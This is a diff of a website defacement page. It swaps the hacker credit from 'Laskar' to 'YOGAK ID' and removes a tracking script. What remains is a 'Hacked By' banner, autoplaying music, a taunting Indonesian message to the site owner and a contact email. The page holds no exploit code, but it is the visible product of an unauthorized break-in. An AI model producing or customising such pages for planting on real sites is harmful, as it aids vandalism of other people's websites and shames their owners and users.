--- a/sc/html/Laskar.html
+++ b/sc/html/Laskar.html
@@ -2,14 +2,13 @@
 <html>
 
 <head>
-    <title>Hacked By Laskar - Indonesian DarkNET</title>
+    <title>Hacked By YOGAK ID - Indonesian DarkNET</title>
     <meta charset="UTF-8" />
-    <meta name="author" content="Laskar" />
+    <meta name="author" content="YOGAK ID" />
     <meta name="viewport" content="width=device-width, initial-scale=1.0" />
-    <meta name="mnd-ver" content="ou7cuvdpl2cyz20gpnzmvw" />
     <meta name="description" content="" />
-    <meta property="og:title" content="Hacked By Laskar - Indonesian DarkNET" />
-    <meta name="keywords" content="Laskar - Indonesian DarkNET, Hacked By Laskar, hacked by Laskar, YOGAK ID, haxor uploader, haxor script deface generator, nathan prinsley, mr.prins, prinsh, hacked by, haxor my id" />
+    <meta property="og:title" content="Hacked By YOGAK ID - Indonesian DarkNET" />
+    <meta name="keywords" content="YOGAK ID - Indonesian DarkNET, Hacked By YOGAK ID, hacked by YOGAK ID, YOGAK ID, haxor uploader, haxor script deface generator, nathan prinsley, mr.prins, prinsh, hacked by, haxor my id" />
     <meta property="og:image" content="https://cdn.prinsh.com/data-1/images/NathanPrinsley-haxor-icon.svg" />
     <meta property="og:type" content="website" />
     <meta property="og:site_name" content="Haxor Uploader" />
@@ -72,20 +71,19 @@
             background-color: #000
         }
     </style>
-    <script async src="https://ss.nwmnd.com/static/fff0a0c2-0920-4174-b1d6-28d4e7d3ad97.js"></script>
 </head>
 
 <body>
     <center />
     <img src="https://k.top4top.io/p_2827ivwu50.png" style="width: 20%">
-    <h1 class="nprinsleyy nprinsley-text-rainbowan" style="font-size:32px;">Hacked By Tn. Laskar</h1>
-    <h2 style="font-size:24px;" class="nathan-prinsley_none">Indonesian DarkNET</h2>
+    <h1 class="nprinsleyy nprinsley-text-rainbowan" style="font-size:24px;">Hacked By Tn. YOGAK ID</h1>
+    <h2 style="font-size:24px;" class="nathan-prinsley_none">-?- Indonesian DarkNET -?-</h2>
     <p class="message_prinsley nathan-prinsley_none"></p>
     <p style="font-size:14px;" class="nathan-prinsley_none"><a class="hubungi_prinsh" href="mailto:"></a></p>
     <p class="othermes_nprinsh nathan-prinsley_none">Gue sangat prihatin dengan tingkat keamanan website loe yang tampaknya lebih ramah kepada risiko daripada yang seharusnya. Keamanan user adalah prioritas utama, dan loe berkomitmen untuk segera memperbaiki hal ini agar penggunaan website loe lebih aman TomLoL.<br><b>-?- Lampung M3 Cyber Community -?-</b></p>
     <audio src="https://prayogak.github.io/sc/assets/psDsRsApYnMgwZoAr.mp3" controls autoplay="1" loop="1"></audio>
     <p class="othermes_nprinsh nathan-prinsley_none">Salah Siapa Salah Loe, Awas Aja Kalo Loe Nyalahin Guek. Dikasih Kepercayaan Sama User Yak Di Jagak Kepercayaan-Nya TomLoL. Badut Sokk Pintar. Ini Adalah Dunia Maya, Siapa Aja Bisa Jadi Apa Ajah AwokKawokKawok.<br><b>GUEK BUKAN SOK PINTAR!</b></p>
-    <p style="font-size: 14px;" class="nathan-prinsley_none"><a class="hubungi_prinsh" href="mailto:yogak@onionmail.org">yogak@onionmail.org</a></p>
+    <p style="font-size: 14px;" class="othermes_nprinsh nathan-prinsley_none">-=| <a class="hubungi_prinsh" href="mailto:yogak@onionmail.org">yogak@onionmail.org</a> |=-</p>
     <marquee class="foonathanPrinsley"><b style="color: #dbd9d9;font-size:16px;" class="nathan-prinsley_none"></b></marquee>
     </center>
 </body>
